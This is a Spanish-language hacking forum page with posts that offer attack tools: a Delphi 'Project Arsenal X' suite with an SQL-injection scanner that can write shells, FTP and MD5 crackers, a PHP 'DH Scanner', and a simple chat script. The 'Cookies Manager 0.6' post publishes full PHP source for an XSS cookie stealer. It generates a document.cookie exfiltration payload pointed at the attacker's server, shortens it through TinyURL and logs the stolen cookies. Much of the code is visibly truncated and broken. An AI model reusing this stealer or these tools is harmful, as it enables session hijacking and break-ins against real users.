Programación / Programación General / [Delphi] Project Arsenal X 0.2 (Regalo de navidad)
en: 25 Diciembre 2015, 18:52 pm
Version en Delphi de este programa similar al juego HackTheGame pero con la unica diferencia de que todo es real xD , tiene las siguientes opciones :
Gmail Inbox Ping Get IP K0bra (Scanner SQLI) [++] Comprobar vulnerabilidad
[++] Buscar numero de columnas
[++] Buscar automaticamente el numero para mostrar datos
[++] Mostras tablas
[++] Mostrar columnas
[++] Mostrar bases de datos
[++] Mostrar tablas de otra DB
[++] Mostrar columnas de una tabla de otra DB
[++] Mostrar usuarios de mysql.user
[++] Buscar archivos usando load_file
[++] Mostrar un archivo usando load_file
[++] Mostrar valores
[++] Mostrar informacion sobre la DB
[++] Crear una shell usando outfile
[++] Todo se guarda en logs ordenados
Panel Control FTP Cracker Whois Downloader Locate IP MD5 Cracker Port Scanner Bing Scanner Console Una imagen :
Un video con ejemplos de uso :
VIDEO Para leer el correo necesitan tener instalado
Win32OpenSSL para que el inbox les funcione , tambien necesitan habilitar la opcion de "Acceso de aplicaciones menos seguras" desde este
link para la cuenta Gmail que van a usar.
Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
Eso seria todo.
38
Programación / PHP / [PHP] Cookies Manager 0.6
en: 18 Diciembre 2015, 21:41 pm
Hoy les traigo una version mejorada de este cookie stealer que les permite capturar,guardar y generar cookies para el robo de cookies usando XSS.
Tiene las siguientes opciones :
Cookie Stealer con generador de TinyURL Pueden ver los cookies que les devuelve una pagina Pueden crear cookies con los datos que quieran Panel oculto con login para entrar usen ?poraca para encontrar al login Una imagen :
Los codigos :
index.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "imagen.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ; echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ; } else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
imagen.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "cookies" ; // Edit
// Functions
function hex_encode( $text )
{
return $texto = '%' . substr ( $texto , 0 , strlen ( $texto ) - 1 ) ; }
function parsear_cookie( $leyendo )
{
$contenido = explode ( ";" , $leyendo ) ;
$nombre = "" ;
$valor_cookie = "" ;
$expires = "" ;
$path = "" ;
$domain = "" ;
$secure = "false" ;
$httponly = "false" ;
foreach ( $contenido as $valor ) {
if ( preg_match ( "/expires=(.*)/" , $valor , $regex ) ) { $expires = $regex [ 1 ] ;
}
elseif ( preg_match ( "/path=(.*)/" , $valor , $regex ) ) { $path = $regex [ 1 ] ;
} elseif ( preg_match ( "/domain=(.*)/" , $valor , $regex ) ) { $domain = $regex [ 1 ] ;
} elseif ( preg_match ( "/secure=(.*)/" , $valor , $regex ) ) { $secure = $regex [ 1 ] ;
} elseif ( preg_match ( "/httponly=(.*)/" , $valor , $regex ) ) { $httponly = $regex [ 1 ] ;
}
else {
$nombre = $regex [ 1 ] ;
$valor_cookie = $regex [ 2 ] ;
}
}
}
$nombre ,
$valor_cookie ,
$expires ,
$path ,
$domain ,
$secure ,
$httponly
) ;
}
function ver_cookies_de_pagina( $pagina )
{
$cookies = "" ;
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
foreach ( $http_response_header as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
} else {
curl_setopt ( $nave , CURLOPT_USERAGENT
, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
foreach ( $leyendo as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
}
return $cookies ;
}
function toma( $target )
{
$code = "" ;
curl_setopt ( $nave , CURLOPT_USERAGENT
, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ; } else {
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
}
return $code ;
}
//
if ( isset ( $_GET [ 'id' ] ) ) {
if ( empty ( $_GET [ 'id' ] ) ) { error( ) ;
}
if ( $ip == "::1" ) {
$ip = "127.0.0.1" ;
}
mysql_query ( "INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia ','$ip ','$info ','$cookie ')" ) ;
header ( "Location:http://www.google.com.ar" ) ;
}
elseif ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cookies Manager 0.6</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>' ;
echo '<br><img src="images/cookies.png" /><br>' ;
if ( isset ( $_POST [ 'makecookies' ] ) ) {
if ( setcookie ( $_POST [ 'name_cookie' ] , $_POST [ 'value_cookie' ] , time ( ) + 7200 , $_POST [ 'path_cookie' ] , $_POST [ 'domain_cookie' ] ) ) { echo "<script>alert('Cookie maked');</script>" ;
} else {
echo "<script>alert('Error making Cookie');</script>" ;
}
}
$edit_name = "" ;
$edit_value = "" ;
$edit_expire = "" ;
$edit_path = "" ;
$edit_domain = "" ;
$edit_secure = "" ;
$edit_httponline = "" ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$cookies_found = "create table cookies_found (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
" ;
echo "<script>alert('Installed');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
if ( isset ( $_GET [ 'del' ] ) ) { if ( @ mysql_query ( "delete from cookies_found where id='" . $_GET [ 'del' ] . "'" ) ) { echo "<script>alert('Cookie deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
// Cookies Found
$re = mysql_query ( "select * from cookies_found order by id ASC" ) ; echo '
<div class="post">
<h3>Cookies Found : ' . $con . '</h3>
<div class="post_body"><br>' ;
if ( $con <= 0 ) {
echo '<b>No cookies found</b><br>' ;
} else {
echo '<table>' ;
echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>" ;
$cookies_view = $ver [ 4 ] ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $cookies_view ) ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
//
// Form para target
echo '
<div class="post">
<h3>Enter Target</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</form>
" ;
echo ' <br></div>
</div>' ;
// URLS
if ( isset ( $_POST [ 'generateurl' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 name=code readonly>\n " ;
$script = hex_encode( "<script>document.location='http://" . $_SERVER [ 'HTTP_HOST' ] . $_SERVER [ 'PHP_SELF' ] . "?id='+document.cookie;</script>" ) ;
//echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
$resultado_code = toma( "http://tinyurl.com/api-create.php?url=" . $_POST [ 'target' ] . $script ) ;
echo "\n </textarea></table>" ;
echo ' <br><br></div>
</div>' ;
}
//
// Get Cookies
if ( isset ( $_POST [ 'getcookies' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 rows=10 name=code readonly>\n " ;
$resultado_code = ver_cookies_de_pagina( $_POST [ 'target' ] ) ;
echo "\n </textarea>" ;
echo ' <br><br></div>
</div>' ;
$leyendo_esto = split ( "\n " , $resultado_code ) ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $leyendo_esto [ 0 ] ) ;
$edit_name = $nombre ;
$edit_value = $valor_cookie ;
$edit_expire = $expires ;
$edit_path = $path ;
$edit_domain = $domain ;
$edit_secure = $secure ;
$edit_httponline = $httponly ;
}
//
// Form para crear cookies
echo '
<div class="post">
<h3>Cookie Maker</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name '><br><br>
<b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value '><br><br>
<b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire '><br><br>
<b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path '><br><br>
<b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain '><br><br>
<b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure '><br><br>
<b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline '><br><br>
<input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
</form>" ;
echo ' <br></div>
</div>' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install Cookies Manager ?</h2><br>
<input type=submit name=instalar value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url ( "images/fondo.jpg" ) repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
textarea {
font : normal 10px Verdana, Arial, Helvetica, sans-serif ;
background-color : black ;
color : gray ;
border : solid #222 2px ;
border-color : gray
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
Un video con ejemplo de usos :
VIDEO Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
39
Programación / PHP / [PHP] DH Chat 0.5
en: 4 Diciembre 2015, 16:23 pm
Un simple chat que hice en PHP que tiene las siguientes opciones :
Solo permite 10 mensajes por lo que borra por antiguedad Filtra malas palabras Se pueden borrar comentarios desde el administrador Una imagen :
Los codigos :
index.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "admin.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ; echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ; } else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
admin.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "chat" ; // Edit
if ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DH Chat 0.5</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center>
' ;
echo ' <br><img src="images/chat.png" /><br>' ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$todo = "create table mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
" ;
$todo2 = "create table insultos (
id_insulto int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
PRIMARY KEY (id_insulto));
" ;
"lammer" ,
"lamer" ,
"maricon" ,
"noob"
) ;
foreach ( $insultos as $con ) {
@ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$con ')" ) ; }
echo "<script>alert('Installed');</script>" ;
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
$re = mysql_query ( "select * from mensajes order by id_comentario ASC" ) ;
if ( isset ( $_GET [ 'id' ] ) ) { if ( @ mysql_query ( "delete from mensajes where id_comentario='" . $_GET [ 'id' ] . "'" ) ) { echo "<script>alert('Comment deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
$sql = "select id_comentario from mensajes" ;
echo '
<div class="post">
<h3>Comments : ' . $cantidad . '</h3>
<div class="post_body"><br>' ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td><b>ID</b></td><td><b>Nick</b></td><td><b>Text</b></td><td><b>Option</b></td><tr>" ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
if ( isset ( $_POST [ 'new_word' ] ) ) { $in = $_POST [ 'word' ] ;
if ( @ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$in ')" ) ) { echo "<script>alert('Word added');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
if ( isset ( $_GET [ 'del_word' ] ) ) { if ( @ mysql_query ( "delete from insultos where id_insulto='" . $_GET [ 'del_word' ] . "'" ) ) { echo "<script>alert('Word deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
echo '
<div class="post">
<h3>Block words</h3>
<div class="post_body"><br>
' ;
echo "
<form action='' method=POST>
<b>Word : </b><input type=text name=word>
<input type=submit name=new_word style='width: 100px;' value=Add>
</form>" ;
echo '
<br>
</div>
</div>
' ;
$sql = "select id_insulto from insultos" ;
echo '
<div class="post">
<h3>Words blocked : ' . $cantidad . '</h3>
<div class="post_body"><br>
' ;
$rea = mysql_query ( "select * from insultos order by id_insulto ASC" ) ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td>ID</td><td>Word</td><td>Option</td><tr>" ;
}
echo "</table>" ;
}
echo '
<br>
</div>
</div>
' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install DH Chat 0.5 ?</h2><br>
<input type=submit name=instalar style='width: 100px;' value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url ( "images/fondo.jpg" ) repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break:break- all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
chat.php
<?php
//DH Chat 0.5
//(C) Doddy Hackman 2015
// DB
$host = "localhost" ; // Edit
$user = "root" ; // Edit
$pass = "" ; // Edit
$db = "chat" ; // Edit
//
echo '<link href="chat.css" rel="stylesheet" type="text/css" />' ;
echo "<table border=0 width='210' style='table-layout: fixed'>" ;
echo "<td><b>DH Chat 0.5</b></td><tr>" ;
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$total = $d ;
}
$test = $total - 10 ;
if ( $test <= 0 ) {
} else {
$resto = $test ;
for ( $i = 1 ; $i <= $resto ; $i ++ ) {
@ mysql_query ( "DELETE FROM mensajes where id_comentario='$i '" ) ; }
}
$re = @ mysql_query ( "select * from mensajes order by id_comentario DESC" ) ;
}
echo "<br><br><td><br><b>Comment</b><br><br>
<form action='' method=POST>
Nick : <input type=text name=apodo size=20><br><br>
Text : <input type=text name=msg size=20><br><br>
<input type=submit name=chatentro style='width: 100px;' value=Send>
</form>
<tr>
<td><b>Coded By Doddy H</b></td><tr>
</table>" ;
if ( isset ( $_POST [ 'chatentro' ] ) ) {
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$x_id = $d + 1 ;
}
$apodo = substr ( $apodo , 0 , 70 ) ; $mensaje = substr ( $mensaje , 0 , 70 ) ;
}
@ mysql_query ( "INSERT INTO mensajes(id_comentario,apodo,mensaje)values('$x_id ','$apodo ','$mensaje ')" ) ; }
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
// The End ?
?>
chat.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break:break- all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
test.php
<body background="test.jpg">
<?php
include ( "chat.php" ) ;
?>
Si quieren bajar el programa lo pueden hacer de
aca .
Cualquier sugerencia para mejorar este proyecto diganla para mejorar.
Saludos.
40
Programación / PHP / [PHP] DH Scanner 0.9
en: 20 Noviembre 2015, 23:53 pm
Version mejorada de este scanner en PHP hecho para buscar vulnerabilidades webs.
Tiene las siguientes opciones :
Bing Scanner con scanner SQLI incluido SQLI Scanner LFI Scanner Crackear varias hashes MD5 Buscador del panel de administracion Localizador de IP y sus DNS Encoders para base64,HEX y MD5 Una imagen :
Un video con ejemplo de usos :
VIDEO Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .